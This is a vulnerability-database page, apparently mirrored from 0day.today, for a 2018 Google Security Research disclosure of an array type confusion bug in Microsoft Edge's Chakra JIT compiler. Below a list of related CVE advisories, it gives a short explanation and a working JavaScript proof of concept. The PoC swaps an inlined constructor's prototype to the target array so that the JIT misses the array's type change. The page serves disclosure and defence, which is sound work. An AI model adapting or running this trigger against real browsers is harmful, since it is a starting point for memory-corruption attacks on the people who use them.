Lucene search

K

Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploit

🗓️ 15 Feb 2018 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 38 Views

Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploi

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion
15 Feb 201800:00
–packetstorm
Symantec
Microsoft Edge Scripting Engine CVE-2018-0838 Remote Memory Corruption Vulnerability
13 Feb 201800:00
–symantec
Check Point Advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0838)
13 Feb 201800:00
–checkpoint_advisories
Microsoft CVE
Scripting Engine Memory Corruption Vulnerability
13 Feb 201808:00
–mscve
NVD
CVE-2018-0838
15 Feb 201802:29
–nvd
NVD
CVE-2018-0857
15 Feb 201802:29
–nvd
NVD
CVE-2018-0836
15 Feb 201802:29
–nvd
NVD
CVE-2018-0856
15 Feb 201802:29
–nvd
NVD
CVE-2018-0858
15 Feb 201802:29
–nvd
NVD
CVE-2018-0861
15 Feb 201802:29
–nvd
Rows per page
/*
This is similar to the previous issues 1457,  1459 (MSRC 42551, MSRC 42552).
 
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
 
PoC:
*/
 
function inlinee() {
 
}
 
function opt(arr) {
    arr[0] = 1.1;
    new inlinee();
    arr[0] = 2.3023e-320;
}
 
function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }
 
    inlinee.prototype = arr;
    opt(arr);
 
    print(arr);
}
 
main();

#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo